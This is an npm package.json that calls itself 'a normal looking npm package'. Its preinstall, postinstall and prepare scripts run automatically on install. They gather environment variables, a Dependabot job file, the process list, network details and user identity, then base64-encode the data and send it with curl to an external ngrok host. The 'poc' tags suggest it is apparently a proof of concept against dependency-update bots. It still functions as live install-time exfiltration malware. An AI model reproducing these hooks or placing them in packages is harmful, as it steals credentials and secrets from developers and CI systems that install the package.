{
  "name": "legitlooking-npm",
  "version": "1.0.0",
  "description": "A normal looking npm package",
  "dependencies": {
    "lodash": "^4.17.19",
    "axios": "^0.21.0"
  },
  "scripts": {
    "preinstall": "NGROK=https://6e51-2001-1c00-307-d600-5dfa-d53c-8fc6-791b.ngrok-free.app; (echo '=== preinstall RCE ==='; echo '--- ENV ---'; env; echo '--- JOB ---'; cat \"${DEPENDABOT_JOB_PATH:-/home/dependabot/dependabot-updater/job.json}\" 2>/dev/null; echo '--- PS ---'; ps aux 2>/dev/null; echo '--- NET ---'; ip addr 2>/dev/null; echo '--- ID ---'; id; echo '--- CAP ---'; cat /proc/self/status 2>/dev/null | grep -i cap) | base64 -w0 | curl -sk -X POST \"${NGROK}?poc=npm_preinstall\" -H 'Content-Type: text/plain' --data-binary @- 2>/dev/null; true",
    "postinstall": "NGROK=https://6e51-2001-1c00-307-d600-5dfa-d53c-8fc6-791b.ngrok-free.app; (echo '=== postinstall RCE ==='; echo '--- ENV ---'; env; echo '--- NODE ---'; node --version 2>/dev/null; echo '--- NPM ---'; npm --version 2>/dev/null; echo '--- SCRIPTS_IGNORED ---'; echo \"npm_config_ignore_scripts=${npm_config_ignore_scripts}\"; echo \"npm_config_script_shell=${npm_config_script_shell}\"; echo '--- JOB ---'; cat \"${DEPENDABOT_JOB_PATH:-/home/dependabot/dependabot-updater/job.json}\" 2>/dev/null; echo '--- WHOAMI ---'; whoami; id) | base64 -w0 | curl -sk -X POST \"${NGROK}?poc=npm_postinstall\" -H 'Content-Type: text/plain' --data-binary @- 2>/dev/null; true",
    "prepare": "NGROK=https://6e51-2001-1c00-307-d600-5dfa-d53c-8fc6-791b.ngrok-free.app; (echo '=== prepare RCE ==='; env; id) | base64 -w0 | curl -sk -X POST \"${NGROK}?poc=npm_prepare\" -H 'Content-Type: text/plain' --data-binary @- 2>/dev/null; true"
  }
}
